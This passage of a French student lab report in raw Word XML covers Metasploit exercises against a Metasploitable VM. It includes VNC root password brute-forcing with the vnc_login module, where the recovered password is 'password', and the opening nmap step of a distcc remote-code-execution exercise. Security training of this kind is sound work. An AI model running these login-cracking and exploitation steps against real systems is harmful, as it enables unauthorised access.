        <w:t xml:space="preserve"> parce que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ncrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> est plus tolérant aux vieilles versions </w:t>
      </w:r>
      <w:r w:rsidR="00C1051A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00C1051A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E70F93" w14:textId="77777777" w:rsidR="00C1051A" w:rsidRDefault="00C1051A" w:rsidP="00002FD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA4D1C1" w14:textId="2FD8C7E7" w:rsidR="00C1051A" w:rsidRPr="00002FD8" w:rsidRDefault="00C1051A" w:rsidP="00002FD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1051A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A79B353" wp14:editId="7C0C0D5F">
            <wp:extent cx="5760720" cy="1148715"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="151186510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65109" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1148715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DA93C" w14:textId="77777777" w:rsidR="001B2E90" w:rsidRPr="001B2E90" w:rsidRDefault="001B2E90" w:rsidP="001B2E90">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5556FA66" w14:textId="77777777" w:rsidR="00073BE2" w:rsidRPr="00073BE2" w:rsidRDefault="00073BE2" w:rsidP="00073BE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D88B7D" w14:textId="77777777" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC740C3" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F006E1" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42592133" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C91D9B" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F60BDA" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752B1269" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70122726" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31923277" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A80C91F" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F310002" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A4849B" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit 6 : VNC (port 5900)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10373531" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Un dernier exploit pour la route. Découvrez quel mot de passe est associé au compte </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> du service VNC qui tourne sur la machine cible. Vous utiliserez pour cela le module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>vnc_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31005BB7" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>vnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>vnc_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5010A8EF" w14:textId="77777777" w:rsidR="00790FDD" w:rsidRPr="00CC5F7D" w:rsidRDefault="00790FDD" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CB36D2" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00C86E87" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set RHOSTS @IPcible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003111A" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00C86E87" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3BAD4" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC493E" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A13538B" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Quel mot de passe est associé à ce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (root) ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA901A" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B055120" w14:textId="53C553C0" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542AD87F" wp14:editId="0E2D81E9">
            <wp:extent cx="5760720" cy="926465"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="30667281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72815" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="926465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278F75B" w14:textId="702377AD" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Login </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>successful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B61B32" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Validez ces </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un terminal avec la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>vncviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E55C2" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>vncviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> @IPcible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CE958" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F7D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Mot de passe : ___________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255FD2D" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D"/>
    <w:p w14:paraId="3FA1D419" w14:textId="4E9BE2E0" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:r w:rsidRPr="00CC5F7D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5B7FEE" wp14:editId="5E8EF12E">
            <wp:extent cx="5760720" cy="3631565"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="1054238612" name="Image 1" descr="Une image contenant ordinateur, logiciel, capture d’écran,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38612" name="Image 1" descr="Une image contenant ordinateur, logiciel, capture d’écran, multimédia&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3631565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A17E8" w14:textId="466C0AA9" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B55B754" w14:textId="2FAFC97E" w:rsidR="00D8611D" w:rsidRPr="003D006E" w:rsidRDefault="0016353C" w:rsidP="003D006E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_Toc197957019"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="00EB30E9" w14:textId="59F8A991" w:rsidR="00A144BF" w:rsidRDefault="00F57F97" w:rsidP="00A144BF">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc197957020"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conception d’un scénario libre d’utilisation avec metasploit et démonstration :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6C3385E3" w14:textId="05BA7F6C" w:rsidR="00F57F97" w:rsidRPr="00F57F97" w:rsidRDefault="00F57F97" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc197957021"/>
      <w:r>
        <w:t>Dans cet exercice, on vous demande de tester un nouvel exploit avec metasploit,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c’est-à-dire de rajouter un nouvel exercice au TP étudié au paragraphe 2.b en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>respectant la mise en forme proposée par les auteurs. (3 points)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="16A91715" w14:textId="77777777" w:rsidR="003E53FE" w:rsidRPr="00F57F97" w:rsidRDefault="003E53FE" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1384A475" w14:textId="4B5119FE" w:rsidR="003E53FE" w:rsidRDefault="00F57F97" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57F97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 7 : </w:t>
      </w:r>
      <w:r w:rsidR="00AE68D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiter le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE68D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE68D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (port 3632) avec Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36819548" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB1E2D8" w14:textId="36A093AC" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Cet exploit est le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RCE sur Metasploitable, et est rapide, simple et fonctionne très bien, l’objectif est d’exploiter le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (port 3632) avec Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48662C" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00D6524A"/>
    <w:p w14:paraId="2167D07B" w14:textId="1A927A7F" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Pour les outils que nous allons utiliser : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9831C2" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00D6524A"/>
    <w:p w14:paraId="52264625" w14:textId="65CDBA0C" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une VM Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718BCD0" w14:textId="28CC130B" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une VM Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C1058" w14:textId="7416CFE3" w:rsidR="003D006E" w:rsidRDefault="001144B0" w:rsidP="00AE68D0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Votre</w:t>
      </w:r>
      <w:r w:rsidR="003D006E">
        <w:t xml:space="preserve"> terminal </w:t>
      </w:r>
      <w:r>
        <w:t>pour pouvoir ping les 2 machines au cas où</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74733E16" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0"/>
    <w:p w14:paraId="2F9D77A1" w14:textId="15D4B236" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
      <w:r>
        <w:t>Commençons ce TP :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F016F6" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0"/>
    <w:p w14:paraId="5064C51C" w14:textId="12B6A46E" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
      <w:r>
        <w:t xml:space="preserve">Premièrement, on va vérifier si le port 3632 est bien ouvert sur notre VM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, donc depuis Kali, nous allons mettre cette commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67641675" w14:textId="3037E9F5" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap -p 3632 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IPMETASPLOITABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12A3D6" w14:textId="77777777" w:rsidR="00AE68D0" w:rsidRDefault="00AE68D0" w:rsidP="00AE68D0">
